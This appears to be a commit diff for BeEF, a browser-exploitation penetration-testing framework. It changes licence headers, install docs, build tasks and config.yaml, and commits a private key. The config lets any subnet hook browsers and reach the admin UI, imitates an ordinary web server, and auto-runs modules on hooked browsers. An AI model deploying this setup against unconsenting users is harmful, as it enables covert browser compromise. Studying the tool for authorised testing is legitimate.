Update version to '0.4.4.4.1-alpha' bug fix edition

will be rendered in the admin UI

.gitignore

@@ -1,3 +1,8 @@
 beef.db
 test/msf-test
-custom-config.yaml
+custom-config.yaml
+.DS_Store
+.gitignore
+.rvmrc
+
+*.lock

BeEFLive.sh

@@ -0,0 +1,2 @@
+# Reference for old (<1.2) versions of BeEF Live
+bash /opt/beef/liveCD/BeEFLive.sh

Gemfile

@@ -1,31 +1,21 @@
 # BeEF's Gemfile
 
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 # Gems only required on Windows, or with specific Windows issues
 if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
   gem "win32console"
-  gem "eventmachine", "1.0.0.beta.4.1"
-else
-  gem "eventmachine", "0.12.10"
 end
 
+gem "eventmachine", "1.0.3"
 gem "thin"
 gem "sinatra", "1.3.2"
+gem "em-websocket", "~> 0.3.6"
+gem "jsmin", "~> 1.0.1"
 gem "ansi"
 gem "term-ansicolor", :require => "term/ansicolor"
 gem "dm-core"
@@ -37,6 +27,9 @@ gem "erubis"
 gem "dm-migrations"
 gem "msfrpc-client"
 
+# notifications
+gem "twitter"
+
 if ENV['BEEF_TEST']
 # for running unit tests
   gem "test-unit"

INSTALL.txt

@@ -0,0 +1,71 @@
+===============================================================================
+   
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+
+===============================================================================
+
+Installation
+------------
+
+   1. Prerequisites (platform independent)
+   2. Prerequisites (Windows)
+   3. Prerequisites (Linux)
+   4. Prerequisites (Mac OSX)
+   5. Install instructions
+   6. Run instructions
+
+
+
+   1. Prerequisites (platform independent)
+
+      BeEF requires ruby 1.9 and the "bundler" gem. Bundler can be installed by:
+
+      gem install bundler
+
+      
+   2. Prerequisites (Windows)
+      
+      Windows requires the sqlite.dll.  Simply grab the zip file below and extract it to your Ruby bin directory:
+
+	  http://www.sqlite.org/sqlitedll-3_7_0_1.zip
+      
+
+   3. Prerequisites (Linux)
+
+      !!! This must be done PRIOR to running the bundle install command !!!
+      
+      On linux you will need to find the packages specific to your distribution for sqlite.  An example for Ubuntu systems is:
+
+      3.0. sudo apt-get install libsqlite3-dev sqlite3 sqlite3-doc
+      3.1. install rvm from rvm.beginrescueend.com, this takes care of the various incompatable and conflicting ruby packages that are required
+      3.2. rvm install 1.9.2
+      3.3. rvm use 1.9.2
+	  
+   4. Prerequisites (Mac OSX)
+   
+      - XCode: provides the sqlite support BeEF needs
+      
+      - Ruby 1.9
+      	To install RVM and Ruby 1.9.3 on Mac OS:  
+      	$ bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile 
+      	$ rvm install 1.9.3-p0 --with-gcc=clang
+		$ rvm use 1.9.3
+      
+
+   5. Install instructions
+   
+      Obtain application code either by downloading an archive from https://github.com/beefproject/beef/zipball/master or cloning the GIT repo git@github.com:beefproject/beef.git
+
+	  Navigate to the ruby source directory and run:
+
+	  bundle install
+
+      Bundler installs all the pre-requisite gems.
+
+   6. Run instructions
+
+      Simply run:
+
+      ./beef

README

@@ -1,79 +1,74 @@
-
-   Copyright 2012 Wade Alcorn wade@bindshell.net
-
-   Licensed under the Apache License, Version 2.0 (the "License");
-   you may not use this file except in compliance with the License.
-   You may obtain a copy of the License at
-
-       http://www.apache.org/licenses/LICENSE-2.0
-
-   Unless required by applicable law or agreed to in writing, software
-   distributed under the License is distributed on an "AS IS" BASIS,
-   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-   See the License for the specific language governing permissions and
-   limitations under the License.
-
-Most of the contents of this file will eventually be added to /install.rb. In the meantime tips, hints and guides for installing BeEF should be kept here.
-
-=============================================
-
-   1. Prerequisites (platform independent)
-   2. Prerequisites (Windows)
-   3. Prerequisites (Linux)
-   4. Prerequisites (Mac OSX)
-   5. Install instructions
-   6. Run instructions
-
-
-
-   1. Prerequisites (platform independent)
-
-      BeEF requires ruby 1.9 and the "bundler" gem. Bundler can be installed by:
-
-      gem install bundler
-
-      
-   2. Prerequisites (Windows)
-      
-      Windows requires the sqlite.dll.  Simply grab the zip file below and extract it to your Ruby bin directory:
-
-	  http://www.sqlite.org/sqlitedll-3_7_0_1.zip
-      
-
-   3. Prerequisites (Linux)
-
-      !!! This must be done PRIOR to running the bundle install command !!!
-      
-      On linux you will need to find the packages specific to your distribution for sqlite.  An example for Ubuntu systems is:
-
-      3.0. sudo apt-get install libsqlite3-dev sqlite3 sqlite3-doc
-      3.1. install rvm from rvm.beginrescueend.com, this takes care of the various incompatable and conflicting ruby packages that are required
-      3.2. rvm install 1.9.2
-      3.3. rvm use 1.9.2
-	  
-   4. Prerequisites (Mac OSX)
-   
-      - XCode: provides the sqlite support BeEF needs
-      
-      - Ruby 1.9
-      	To install RVM and Ruby 1.9.3 on Mac OS:  
-      	$ bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile 
-      	$ rvm install 1.9.3-p0 --with-gcc=clang
-		$ rvm use 1.9.3
-      
-
-   5. Install instructions
-   
-      Obtain application code either by downloading an archive from https://github.com/beefproject/beef/zipball/master or cloning the GIT repo git@github.com:beefproject/beef.git
-
-	  Navigate to the ruby source directory and run:
-
-	  bundle install
-
-      Bundler installs all the pre-requisite gems.
-
-   6. Run instructions
-
-      Simply run:
-
-      ./beef
+===============================================================================
+   
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+
+===============================================================================
+
+What is BeEF?
+-------------
+
+BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
+
+Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
+
+
+Get Involved 
+------------
+
+You can get in touch with the BeEF team. Just check out the following: 
+
+
+Please, send us pull requests!
+
+Web: http://beefproject.com/
+
+Mail: beef-subscribe@bindshell.net
+
+IRC: ircs://irc.freenode.net/beefproject
+
+Twitter: @beefproject
+
+
+Requirements
+------------
+
+* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
+* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
+* [SQLite](http://sqlite.org) 3.x
+* The following GEMS: 
+   - bundler 
+   - thin
+   - Sinatra 
+   - ANSI 
+   - TERM-ANSIcolor 
+   - dm-core 
+   - json 
+   - data_objects 
+   - dm-sqlite-adapter 
+   - parseconfig 
+   - erubis 
+   - dm-migrations 
+   - msfrpc-client 
+   - eventmachine
+   - win32console (Windows Only)
+
+
+Quick Start
+----------- 
+
+__The following is for the impatient.__ 
+
+For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
+
+   $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
+
+
+Usage 
+----- 
+
+To get started, simply execute beef and follow the instrustions: 
+
+   $ ./beef
+

README.mkd

@@ -0,0 +1,74 @@
+===============================================================================
+   
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
+
+===============================================================================
+
+What is BeEF?
+-------------
+
+__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser.
+
+Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
+
+
+Get Involved 
+------------
+
+You can get in touch with the BeEF team. Just check out the following: 
+
+
+__Please, send us pull requests!__
+
+__Web:__ http://beefproject.com/
+
+__Mail:__ beef-subscribe@bindshell.net
+
+__IRC:__ ircs://irc.freenode.net/beefproject
+
+__Twitter:__ @beefproject
+
+
+Requirements
+------------
+
+* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
+* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
+* [SQLite](http://sqlite.org) 3.x
+* The following GEMS: 
+   - bundler 
+   - thin
+   - Sinatra 
+   - ANSI 
+   - TERM-ANSIcolor 
+   - dm-core 
+   - json 
+   - data_objects 
+   - dm-sqlite-adapter 
+   - parseconfig 
+   - erubis 
+   - dm-migrations 
+   - msfrpc-client 
+   - eventmachine
+   - win32console (Windows Only)
+
+
+Quick Start
+----------- 
+
+__The following is for the impatient.__ 
+
+For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
+
+       $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
+
+
+Usage 
+----- 
+
+To get started, simply execute beef and follow the instructions: 
+
+       $ ./beef
+

Rakefile

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 task :default => ["quick"]
@@ -86,10 +76,10 @@ end
 @beef_process_id = nil;
 
 task :beef_start => 'beef' do
-  printf "Starting BeEF (wait 10 seconds)..."
+  printf "Starting BeEF (wait a few seconds)..."
   @beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
-  delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
-  delays.each do |i| # delay for 10 seconds
+  delays = [3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
+  delays.each do |i| # delay for a few seconds
     printf '.'
     sleep (i)
   end
@@ -152,3 +142,45 @@ task :dmg do
   puts "\nBeEF.dmg created\n"
 end
 
+
+################################
+# Create CDE Package
+# This will download and make the CDE Executable and 
+# gnereate a CDE Package in cde-package
+
+task :cde do
+  puts "\nCloning and Making CDE...";
+  sh "git clone git://github.com/pgbovine/CDE.git";
+  Dir.chdir "CDE";
+  sh "make";
+  Dir.chdir "..";
+  puts "\nCreating CDE Package...\n";
+  sh "bundle install"
+  Rake::Task['cde_beef_start'].invoke
+  Rake::Task['beef_stop'].invoke
+  puts "\nCleaning Up...\n";
+  sleep (2);	
+  sh "rm -rf CDE";
+  puts "\nCDE Package Created...\n";
+ end
+
+################################
+# CDE/BeEF environment set up
+
+@beef_process_id = nil;
+
+task :cde_beef_start => 'beef' do
+  printf "Starting CDE BeEF (wait 10 seconds)..."
+  @beef_process_id = IO.popen("./CDE/cde ruby beef -x 2> /dev/null", "w+")
+  delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
+  delays.each do |i| # delay for 10 seconds
+    printf '.'
+    sleep (i)
+  end
+  puts '.'
+end
+
+
+################################
+
+

VERSION

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
-0.4.3.4-alpha
+0.4.4.4.1-alpha

beef

@@ -1,19 +1,9 @@
 #!/usr/bin/env ruby
 
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 # stop deprecation warning from being displayed
@@ -59,6 +49,15 @@ if BeEF::Core::Console::CommandLine.parse[:ascii_art] == true
   BeEF::Core::Console::Banners.print_ascii_art
 end
 
+# @note Check if port and WebSocket port need to be updated from command line parameters
+unless BeEF::Core::Console::CommandLine.parse[:port].empty?
+  config.set('beef.http.port', BeEF::Core::Console::CommandLine.parse[:port])
+end
+
+unless BeEF::Core::Console::CommandLine.parse[:ws_port].empty?
+  config.set('beef.http.websocket.port', BeEF::Core::Console::CommandLine.parse[:ws_port])
+end
+
 # @note Prints BeEF welcome message
 BeEF::Core::Console::Banners.print_welcome_msg
 
@@ -72,7 +71,7 @@ Socket.do_not_reverse_lookup = true
 case config.get("beef.database.driver")
   when "sqlite"
     DataMapper.setup(:default, "sqlite3://#{$root_dir}/#{config.get("beef.database.db_file")}")
-  when "mysql","postgres"
+  when "mysql", "postgres"
     DataMapper.setup(:default,
                      :adapter => config.get("beef.database.driver"),
                      :host => config.get("beef.database.db_host"),
@@ -112,6 +111,16 @@ BeEF::Core::Console::Banners.print_network_interfaces_routes
 #@note Prints the API key needed to use the RESTful API
 print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}"
 
+#@note Starts the WebSocket server
+if config.get("beef.http.websocket.enable")
+  BeEF::Core::Websocket::Websocket.instance
+  print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
+  if config.get("beef.http.websocket.secure")
+    print_info "Starting WebSocketSecure server on port [#{config.get("beef.http.websocket.secure_port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
+  end
+end
+
+
 # @note Call the API method 'pre_http_start'
 BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server)
 
@@ -122,7 +131,7 @@ if config.get("beef.extension.console.shell.enable") == true
   begin
     FileUtils.mkdir_p(File.expand_path(config.get("beef.extension.console.shell.historyfolder")))
     BeEF::Extension::Console::Shell.new(BeEF::Extension::Console::Shell::DefaultPrompt,
-                                        BeEF::Extension::Console::Shell::DefaultPromptChar,{'config' => config, 'http_hook_server' => http_hook_server}).run
+                                        BeEF::Extension::Console::Shell::DefaultPromptChar, {'config' => config, 'http_hook_server' => http_hook_server}).run
   rescue Interrupt
   end
 else

beef_cert.pem

@@ -0,0 +1,19 @@
+-----BEGIN CERTIFICATE-----
+MIIDDjCCAnegAwIBAgIJAKNYRH/AaB3DMA0GCSqGSIb3DQEBBQUAMIGfMQswCQYD
+VQQGEwJBVTEUMBIGA1UECAwLQm92aW5lIExhbmQxDTALBgNVBAcMBEJlRUYxDTAL
+BgNVBAoMBEJlRUYxDTALBgNVBAsMBEJlRUYxJzAlBgNVBAMMHkJyb3dzZXIgRXhw
+bG9pdGF0aW9uIEZyYW1ld29yazEkMCIGCSqGSIb3DQEJARYVQmVFRkBkb250d3Jp
+dGVtZS5CZUVGMB4XDTEyMDgwNjEzMDUzOFoXDTEzMDgwNjEzMDUzOFowgZ8xCzAJ
+BgNVBAYTAkFVMRQwEgYDVQQIDAtCb3ZpbmUgTGFuZDENMAsGA1UEBwwEQmVFRjEN
+MAsGA1UECgwEQmVFRjENMAsGA1UECwwEQmVFRjEnMCUGA1UEAwweQnJvd3NlciBF
+eHBsb2l0YXRpb24gRnJhbWV3b3JrMSQwIgYJKoZIhvcNAQkBFhVCZUVGQGRvbnR3
+cml0ZW1lLkJlRUYwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALCxzu+rOTt2
+VBM5X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP
+0l+pKgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0Z
+F/0y0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAGjUDBOMB0GA1UdDgQWBBTaXny0
+kTye7CAr0ronsg0ob63+kTAfBgNVHSMEGDAWgBTaXny0kTye7CAr0ronsg0ob63+
+kTAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBABTy5s/XRd6iBwxOgV6N
+B+cTRgmgHciujbI+0p4TkOkHvQPhhcD3207ndWWwv+Mc2XeQcXNaOfYUDkeCs64N
+JffqThykYOdagvCu1Gecw9BEKeijS9MAuNvtvP7fcUNUql+VeTFbxMBPGDhusafz
+GkY0IBg9+j6XX4JwEXxCGt0a
+-----END CERTIFICATE-----

beef_key.pem

@@ -0,0 +1,16 @@
+-----BEGIN PRIVATE KEY-----
+MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBALCxzu+rOTt2VBM5
+X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP0l+p
+KgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0ZF/0y
+0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAECgYAKpDrNTmedACxiGAN8hPXGKCw3
+HlLuBKTRLJ/Mgel29DxeIy5gXnAuCaQzXKKTPabJxIugj5r9pH4MCtkf1T15Aib6
+4MFdx4UegllMUo7eUiuCtSmK9s0wEtJjShujBl4qQ10ZtWUh4Vd/clS88IjM/iPI
+5Ocoph5PUgFt/tX7DQJBAOkGptgdri39bRiSGaR/Si6YYpmMUFoQt+s2id8yH9QS
+26o8cHZKCahSiWLNi4rSzEJIOpXnP3n+Dcq2JttDWGcCQQDCHWgWSpdnX8uqp/Qo
+yp0RZJwyBFoba4bWhzoQJj+39P0+4FBaMlZyLHZ7nd4z0JiE5S3qA9xi8zjQVrrI
+rTWnAkEAmpPxBZfavWNJhW0VWYue1/36GkV73+MLPhq1pruHZZUE5o6lQ7KlaWUn
+AcW79WEUYjursVjvQKuI1pmyeOzZrQJBAIGQHSxbxyjBgPA8QDSF4EZ+r96Wlwoc
+QBiqk6+5x+fiBrJUCG3bkWWNldu2qFxPS63QRlAfGZeWHgK5ENzm95sCQQCe81hU
+WaVM9bmt0ZvfhfQXfgvf3xKNUFemd4skTMUDgNCH1OFULB/Mz16kJDdy0q0qUS88
+yBgay+U9QuoEO425
+-----END PRIVATE KEY-----

config.yaml

@@ -1,57 +1,75 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # BeEF Configuration file
 
 beef:
-    version: '0.4.3.4-alpha'
+    version: '0.4.4.4.1-alpha'
     debug: false
 
     restrictions:
-        # subnet of browser ip addresses that can hook to the framework 
+        # subnet of browser ip addresses that can hook to the framework
         permitted_hooking_subnet: "0.0.0.0/0"
-        # subnet of browser ip addresses that can connect to the UI 
+        # subnet of browser ip addresses that can connect to the UI
         # permitted_ui_subnet: "127.0.0.1/32"
         permitted_ui_subnet: "0.0.0.0/0"
-    
+
     http:
         debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
         host: "0.0.0.0"
         port: "3000"
+        # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.
+        # It's not advised to decrease it with tons of hooked browsers (more than 50),
+        # because it might impact performance. Also, enable WebSockets is generally better.
+        xhr_poll_timeout: 5000
         # if running behind a nat set the public ip address here
         #public: ""
+        #public_port: "" # port setting is experimental
         dns: "localhost"
         panel_path: "/ui/panel"
         hook_file: "/hook.js"
         hook_session_name: "BEEFHOOK"
         session_cookie_name: "BEEFSESSION"
+
+        # Prefer WebSockets over XHR-polling when possible.
+        websocket:
+          enable: false
+          secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
+          port: 61985 # WS: good success rate through proxies
+          secure_port: 61986 # WSSecure
+          ws_poll_timeout: 1000 # poll BeEF every second
+
         # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
         web_server_imitation:
-            enable: false
+            enable: true
             type: "apache" #supported: apache, iis
 
+        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
+        https:
+            enable: false
+            # In production environments, be sure to use a valid certificate signed for the value
+            # used in beef.http.dns (the domain name of the server where you run BeEF)
+            key: "beef_key.pem"
+            cert: "beef_cert.pem"
+
     database:
         # For information on using other databases please read the
         # README.databases file
 
         # supported DBs: sqlite, mysql, postgres
+        # NOTE: you must change the Gemfile adding a gem require line like:
+        #   gem "dm-postgres-adapter"
+        # or
+        #   gem "dm-mysql-adapter"
+        # if you want to switch drivers from sqlite to postgres (or mysql).
+        # Finally, run a 'bundle install' command and start BeEF.
         driver: "sqlite"
 
         # db_file is only used for sqlite
         db_file: "beef.db"
-        
+
         # db connection information is only used for mysql/postgres
         db_host: "localhost"
         db_name: "beef"
@@ -64,16 +82,33 @@ beef:
         user:   "beef"
         passwd: "beef"
 
+    # Autorun modules as soon the browser is hooked.
+    # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
+    autorun:
+        enable: true
+        # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify
+        allow_user_notify: true
+
     crypto_default_value_length: 80
 
+    # Enable client-side debugging
+    client:
+        debug: false
+
     # You may override default extension configuration parameters here
     extension:
         requester:
-            enable: true 
+            enable: true
         proxy:
-            enable: true 
+            enable: true
         metasploit:
             enable: false
+        social_engineering:
+            enable: true
+        evasion:
+            enable: false
         console:
-            shell:
+             shell:
                 enable: false
+        ipec:
+            enable: true

core/api.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF

core/api/extension.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF

core/api/extensions.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module API

core/api/main/configuration.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API

core/api/main/migration.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API

core/api/main/network_stack/assethandler.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API

core/api/main/server.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API

core/api/main/server/hook.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
